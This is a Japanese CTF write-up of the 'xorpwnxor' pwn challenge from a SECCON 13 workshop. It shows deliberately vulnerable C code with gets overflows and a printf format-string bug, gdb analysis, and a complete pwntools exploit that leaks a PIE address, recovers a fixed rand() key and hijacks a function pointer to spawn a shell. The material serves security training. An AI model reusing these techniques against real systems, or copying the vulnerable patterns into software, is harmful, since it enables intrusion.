💀
【SECCON】RWPL Pwn Challenge - xorpwnxor

2025/03/02に公開
Security
 はじめに2025/3/1に実施したSECCON 13 電脳会議のRWPL WorkShopで提供したおまけPwn問題のWriteUpです。
問題については以下のリポジトリにて公開しています（Pwnだけじゃなく本題のWeb hacking用の問題もあります）。

https://github.com/RWPL/seccon13-workshop
RWPLについては以下のHPを参照してみてください。

https://rwpl.github.io/

 環境準備
 Toolsのインストールお好きなx86のLinuxディストリビューション（筆者はkali linux）を用意して以下のToolをインストールしてください。
gdb
Python3
pwntools
pwndbg
docker
docker-compose

 問題環境の構築以下のコマンドで問題をダウンロードし、問題サーバを起動してください。
git clone  https://github.com/RWPL/seccon13-workshop
cd  seccon13-workshop/xorpwnxor
chmod +x chal
sudo docker-compose up
nc localhost 4000を実行し、以下のようなメッセージが表示されれば問題サーバが起動しています。

 xorpwnxor実際に問題を解いていきます。

提供されている問題に関するファイルは以下の通りです。これらをみていきます。
chal.c
chal

 コード解析まずはchal.cを見ていきます。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct Object {
    char name[64];
    char description[128];

    void (*func)(struct Object *);
} Object;

unsigned long key;

void secret_function(Object *obj) {
    (void)obj;
    puts("This is a safe function.");
}

void win(Object *obj) {
    (void)obj;
    system("/bin/sh");
}

void call_func(Object *obj) {
    void (*decoded)(Object *);
    decoded = (void (*)(Object *))(((unsigned long) obj->func) ^ key);
    decoded(obj);
}

Object *create_object() {
    Object *obj = malloc(sizeof(Object));
    if (!obj) {
        exit(1);
    }
    memset(obj, 0, sizeof(Object));
    strncpy(obj->name, "default", sizeof(obj->name)-1);
    obj->func = (void (*)(Object *))(((unsigned long) secret_function) ^ key);
    return obj;
}

void edit_object(Object *obj) {
    printf("Edit description: ");
    gets(obj->description);
}

void rename_object(Object *obj) {
    printf("Rename (input new name): ");
    gets(obj->name);
}

void print_object(Object *obj) {
    printf("Name: ");
    printf(obj->name);
    printf("\n");
    printf("Description: %s\n", obj->description);
}

void delete_object(Object *obj) {
    free(obj);
}

int main() {
    setbuf(stdout, NULL);
    key = rand();

    Object *obj = create_object();
    int choice;

    while (1) {
        printf("\nMenu:\n");
        printf("1. View object\n");
        printf("2. Edit object description\n");
        printf("3. Rename object\n");
        printf("4. Call object's function\n");
        printf("5. Delete object\n");
        printf("6. Allocate new object\n");
        printf("7. Print libc info\n");
        printf("8. Exit\n");
        printf("Choice: ");
        scanf("%d", &choice);
        getchar();
        switch(choice) {
            case 1:
                print_object(obj);
                break;
            case 2:
                edit_object(obj);
                break;
            case 3:
                rename_object(obj);
                break;
            case 4:
                call_func(obj);
                break;
            case 5:
                delete_object(obj);
                break;
            case 6:
                obj = create_object();
                break;
            case 7:
                printf("puts address: %p\n", puts);
                break;
            case 8:
                exit(0);
                break;
            default:
                printf("Invalid choice.\n");
        }
    }
    return 0;
}
1-8の機能があり、構造体をいじくっていく機能がありそうです。ヒープ問題な匂いがしますね。
気になる機能としてはcase 4のcall_funcです。call_funcはobj->funcを呼び出していますが、その前にkeyでobj->funcをxorしています。

create_objectでobj->funcにsecret_functionをxorしているので、call_funcでsecret_functionを呼び出すといった流れに見えます。

確認してみます。
呼び出していますね。ではこのsecret_functionのXORされたアドレスをwinのXORされたアドレスに書き換えてwinを呼び出せばShellをゲット出来そうです。
またedit_objectに関してはgetsが使われて入力を受け付けています。特段入力制限やObjectの状態を見ていないので、ここにHeap Buffer OverflowやUAF（freeしたHeapに色々できそう）の脆弱性が存在しそうです。

rename_objectに関してもHeap Buffer OverflowやUAFの脆弱性が同様にありそうです。
print_objectに関しては以下のようにprintf(obj->name)で直接obj->nameを出力しているので、FSB（Format String Bug）の脆弱性がありそうです。
void print_object(Object *obj) {
    printf("Name: ");
    printf(obj->name);
    printf("\n");
    printf("Description: %s\n", obj->description);
}
諸々脆弱性があるので何を使っていくか迷いますが、基本的にobj->funcのsecret_functionをwinに書き換える のがゴールになりそうですね。
では実際にchalを動かしてみます。

 動的解析chalを動かしてみます。pwndbgを使って解析していきます。gdbinitfileに以下の設定を追加しておくと便利です。
# gdbinitにpwndbgをインストールしたディレクトリのgdbinit.pyを読み込む
source /[to_path_pwndbg]/pwndbg/gdbinit.py
以下のコマンドでchalを動かします。
gdb ./chal
次にchecksecでバイナリのセキュリティ機構を確認します。

セキュリティ機構の各項目がどのようなものなのかは以下のリンクを参照してください。

https://miso-24.hatenablog.com/entry/2019/10/16/021321
確認した結果は以下です。
PIE enabledになっているのでwinのアドレスを特定するのが難しくなりそうです。
適当に以下の実行をしてHeapの状態を確認してみます。
visコマンドでHeapの状態を視覚的に確認できます。
edit_objectを利用してdescription領域に対して0x80以上のバイトを注入してHeap Buffer Overflowを実施し、secret_functionのアドレスをwinのアドレスに書き換えることが出来そうですね。
というわけで以下2つの情報を取得出来れば、Exploitが成功しそうです。

keyの情報

winのアドレス（PIE enabledによって実行ごとにアドレスが変化するため）

 keyの特定keyがどういった値を取るのか実際に確認してみます。

以下コマンドでkeyが呼び出されている位置をみます。
disass call_func
0x55555555533bでraxにkeyを格納する命令があります。ここにブレークポイントを設定します。
4のcall_funcを実行してみます。
nで実行を進めてやると、raxにkeyの値が格納されていることがわかります。
次の命令でraxとrdxをXORしているので、この0x6b8b4567がkeyとして使われていることがわかりますが、コードではkey = rand();で呼び出されているので毎回変わる可能性があります。

ですが待ってください。このコード、Seedを指定してないので値が固定されそうですね。
何度か実行してみればわかりますが、この0x6b8b4567の値が変化することはありません。

なので、keyは0x6b8b4567として固定されていることがわかりました。

 winのアドレスの特定winのアドレスを特定するためにFSBの脆弱性を利用します。FSBはスタック上のデータリークやメモリへの書き込みによる改ざんが可能な便利な脆弱性です。

FSBについてもっと知りたい方は以下のリンクなどを参照してください。
https://ptr-yudai.hatenablog.com/entry/2018/10/06/234120
今回はchalがどのアドレスにマップされているか確認したいのでメモリリークを行います。

一応現在のメモリマップを確認します。vmmapというコマンドで確認できます。
メモリリークを行う為、obj->nameに設定する文字をPythonで簡易に作成します。
print(','.join(f'%{i}$p' for i in range(1,10)))
これをrename_objectで入力し、print_objectで出力させます。
%9$pで出力されている0x555555555600の値がどのアドレス領域なのか確認します。
chalのアドレス領域が確認できました。このリークされたアドレスからwinのアドレスが相対的にどれくらい離れているのか計算します。

まず、inf funcコマンドで現在のwinのアドレスが確認できます。
0x00005555555552fbにありそうですね。ではwinのアドレスとリークされたアドレスの差を計算します。
リークアドレスから0x305ほど離れたアドレスがwinのアドレスに当たりそうです。
これでkeyとwinのアドレスが特定できたので、Exploitを書いていきます。

 Exploit以下のPythonコードを用意してExploitを実行できます。
from pwn import *
import time

binfile = './chal'
rhost = 'localhost'
rport = 4000 

gdb_script = '''
vis
'''

elf = ELF(binfile)
context.binary = elf

def conn():
    if args.REMOTE:
        p = remote(rhost, rport)
    else:
        p = process(elf.path)
    return p

p = conn()

def view_obj():
    p.sendlineafter(b'Choice:', b'1')
    p.recvuntil(b'Name: ')
    name = p.recvline()[:-1]
    p.recvuntil(b'Description: ')
    desc = p.recvline()[:-1]
    return name, desc

def edit_obj(desc):
    p.sendlineafter(b'Choice:', b'2')
    p.sendlineafter(b'description: ', desc)

def rename_obj(name):
    p.sendlineafter(b'Choice:', b'3')
    p.sendlineafter(b'name): ', name)
    
def call_obj():
    p.sendlineafter(b'Choice:', b'4')
  
key = 0x6b8b4567 # no seed    
rename_obj(b'%9$p')
leak, _ = view_obj()
print("Leak addr: ", leak)

win = int(leak,16) - (0x555555555600-0x00005555555552fb) # 0x305
print("Win: ", hex(win))

payload = b'A'*0x80
payload += pack(win^key)

edit_obj(payload)

# gdb.attach(p, gdbscript=gdb_script)
# time.sleep(1)
call_obj()

p.interactive()
!以下のコメントアウトを外してgdbを使ってExploit途中の状態を確認できます。

お好きな位置にこのコードを追加して見ると、メモリの挙動が確認でき面白いと思います。
※デフォルトでvisコマンドを打つようにしています。
gdb_script = '''
vis
'''

# gdb.attach(p, gdbscript=gdb_script)
# time.sleep(1)
実行するとこのようにShellをゲットできます。

 おわりに今回はSECCON 13 電脳会議のRWPL Workshopで提供したPwn問題のWriteUpを記載しました。

皆さん楽しんで頂けたなら幸いです。